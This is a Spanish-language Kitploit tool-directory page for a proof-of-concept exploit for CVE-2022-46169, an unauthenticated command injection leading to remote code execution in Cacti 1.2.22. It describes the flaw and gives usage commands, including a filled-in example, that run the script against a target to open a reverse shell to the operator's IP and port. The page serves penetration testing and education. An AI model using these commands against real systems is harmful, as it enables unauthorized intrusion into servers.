Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-46169 — PoC para CVE-2022-46169 que afecta a Cacti versión 1.2.22 | Kitploit
Herramientas/GitHubGitHub/devilgothies/cve-2022-46169
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubdevilgothies/cve-2022-46169

CVE-2022-46169

PoC para CVE-2022-46169 que afecta a Cacti versión 1.2.22

Ver Repositorio
hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-46169 POC

Este es un script de Prueba de Concepto (POC) para la vulnerabilidad CVE-2022-46169 que afecta a Cacti versión 1.2.22.

Descripción

La vulnerabilidad CVE-2022-46169 permite una inyección de comandos sin autenticación en versiones de Cacti hasta la 1.2.22, logrando así una ejecución remota de código sin autenticación como el usuario www-data. La vulnerabilidad es causada por una validación incorrecta de la entrada del usuario en el parámetro "host_id" del archivo "remote_agent.php".

Uso

root@kitploit:~
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>

Reemplace <TARGET_URL> con la URL de la instalación de Cacti objetivo, <YOUR_IP> con la dirección IP de la máquina donde desea recibir la reverse shell, y <YOUR_PORT> con el número de puerto donde desea recibir la reverse shell.

Ejemplo:

root@kitploit:~
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337

Aviso legal

Este script POC es solo para fines educativos. Úselo bajo su propio riesgo. El autor de este script no es responsable de ningún daño causado por el uso del mismo.

Referencias

CVE-2022-46169 - Entrada CVE de la vulnerabilidad.
Advertencias de seguridad de Cacti en Github

Descargar herramienta